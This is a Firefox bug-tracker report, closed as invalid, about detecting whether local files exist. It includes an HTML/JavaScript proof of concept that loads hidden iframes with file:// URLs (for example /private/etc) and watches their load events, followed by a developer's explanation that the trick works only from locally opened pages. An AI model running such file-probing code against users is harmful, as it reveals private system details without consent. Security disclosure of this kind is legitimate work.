Detection of arbitrary local files

RESOLVED INVALID

Status

()

RESOLVED INVALID
2 years ago
2 years ago

People

(Reporter: junorouse, Unassigned)

Tracking

52 Branch
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

619 bytes, text/html
Details
(Reporter)

Description

2 years ago
Created attachment 8847596 [details]
a.html

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Steps to reproduce:

I sent you an email. But I can't receive an email.

I can detect a local file. But only file:// protocol can. But chrome and many other browsers blocked this way.

I am macOs Sierra 10.12.3.

POC

------------------------------------

<iframe src="file:///private/etc/" style="display:none" id="d"></iframe>
<div id="x">
</div>

<script>

function go(e) {
document.getElementById('check').innerHTML = "no";
var d = document.getElementById('d');
var x = document.getElementById('x');
var c = d.cloneNode();
function file_onLoad() {
document.getElementById('check').innerHTML = "exist";
}
c.addEventListener('load', file_onLoad, false);
c.src="file://" + document.getElementById('ww').value;
x.appendChild(c);
}

</script>
<input type='text' value="/private/etc" id='ww' />

<input type='button' value="check" onclick='go(this)'/>
<div id="check">
</div>


Actual results:

Detect all local files existing. 

https://youtu.be/RWp4sEQE-H4


Expected results:

Can detect all local files.
Group: firefox-core-security → dom-core-security
Component: Untriaged → DOM
Product: Firefox → Core
Duplicate of this bug: 1347546
This does not work when loaded from the web, only if loaded as a local file. There's currently no standard for how local files are treated, everything from "all file:// are same origin" to "each file:// is a separate origin". Chrome does the latter, we're somewhere in the middle.
Group: dom-core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.